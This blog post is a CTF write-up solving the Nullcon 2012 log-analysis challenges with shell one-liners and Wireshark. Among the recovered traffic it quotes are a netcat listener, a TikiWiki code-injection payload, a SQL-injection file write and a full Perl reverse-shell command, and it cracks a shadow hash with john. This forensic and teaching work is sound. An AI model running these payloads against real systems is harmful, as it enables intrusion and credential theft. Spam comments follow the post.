Dienstag, 17. Januar 2012

Nullcon 2012 Writeup on Log Analysis

The log analysis levels were straightforward, but maybe there are still some ppl, who are interested in the solution.

Level1 (Analysing the the Nikto report file)

You will notice fast, that there is a line containing the challenge path.
+ OSVDB-3268: GET /challenge/logically_insane/  : Directory indexing is enabled: /challenge/logically_insane/

After navigating to this folder, you will see a (fake) directory listing with askmelater.asp inside.

After navigating to this file and watching the directory listing, you get the hint "Ask the proper question to get the proper answer" and the parameter information askmelater.asp?question=?

Using flag as parameter you get the Flag: 6bb61e3b7bce0931da574d19d1d82c88 <-- this is generated, so your flag is maybe something else

Level2 (Analysing the the pcap file)

This was more about manually scrolling the packets in Wireshark and looking into the contents. After reaching paket number 28, you see response of a select and the password ..Supp@..adm1n, which is the flag.

Level3 (Analysing the the 25M access log)

Some web scanner flooded the logs, so you cannot look on it by scrolling.
What i've done is just looking at the question, we need the attacker ip, so i filtered all IPs first.

$ cat access.log | awk '{print $1}' | sort | uniq
127.0.0.1
192.168.0.105
192.168.0.107
192.168.0.110


Afterwards i filtered by IP and was hoping that the shortest log will have the answer.

$ cat access.log | grep 192.168.0.107
192.168.0.107 - - [] "GET /index.php HTTP/1.1" 200 1364
192.168.0.107 - - [] "GET /javascript/jquery.js HTTP/1.1"
192.168.0.107 - - [] "GET /javascript/common.js HTTP/1.1"
192.168.0.107 - - [] "GET /Contacts.php HTTP/1.1"
192.168.0.107 - - [] "GET /add-contact.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"


And truely, the answer is inside the shortest log.

base64decode("bmMgLWwgLXAgNjY2Ng==") == nc -l -p 6666

The attacker is coming from 192.168.0.107 and uses contact.php to start netcat on port 6666.

Level4 (Analysing the the Burp session log)

Unfortunately i don't have a full version of Burp, so i couldn't load the logfile into the application.

According to level3, i tried to identify the attacker first by sorting to a uniq attribute. I have randomly chosen the User-Agent for this.

$ cat burp.log | grep User-Agent | sort | uniq
User-Agent: Internet Explorer 6.0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1


IE6 is running, so i thought, this could be a client side exploit. After manually looking into the file using VI, i recognized, that there is a command execution.

POST /tikiwiki/scripts/server.php HTTP/1.1^M
TE: deflate,gzip;q=0.3^M
Connection: TE, close^M
Host: 192.168.221.154^M
User-Agent: Internet Explorer 6.0^M
Content-Length: 360^M
^M
foo.bar1111','')); system('id
'); die; /*



I googled for "tikiwiki server.php code execution" and found the CVE number.
Flag: CVE-2005-1921

Level5 (Analysing the the 93M pcapng file)

We have to find 4 flags this time.
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password


I startet with the last part, somebody uses local root exploits so there should be traces of this.

$ strings dump.pcapng | grep root
...
root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
...
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
ggcc 9479.c -o root
./root
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
...


sock_sendpage() exploit can be found fast at exploit-db, in which you can see the line "Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team."

Flag3 is found, now search for the others.

Guessing it is a webexploit, i did a grep for "GET" and found the following lines.

GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,'',3,4,5+INTO+OUTFILE '/tmp/test2.txt'--+- HTTP/1.1

GET /index.html?page=../../../../../../../../../tmp/test2.txt&c=perl -e 'use Socket;$i="192.168.221.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


What can we see here?
The first request is an SQL-Injection writing the line "" into the file "/tmp/test2.txt"

The second request is using a directory traversal bug to execute the test2.txt file, which should execute the perl connect shell.

We see that the attacker has the IP 192.168.221.130 and listens on port 4444.

Our first flag is id and the second one is page.

I've loaded the pcapng file into wireshark and set the filter "ip.addr==192.168.221.130 && tcp.port==4444"

Here is the full shell log can be found here

I couldn't find the root password inside the network dump, so i started john.
$ john nullcon.tmp
Loaded 1 password hash (FreeBSD MD5 [32/64 X2])

After some time: zuzana




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Kommentare:

  1. As a Swiss brand name watches, Omega has greatly aroused so monster beats heartbeats
    Beats Headphones
    Beats Tour
    many people's attentions while its expensive price does keep many people far away from it.

    AntwortenLöschen
  2. Hi there, You’ve done an excellent job. I’ll definitely woolrich outlet digg it and in my view suggest to my friends. I am sure woolrich parka they will be benefited from this site.

    AntwortenLöschen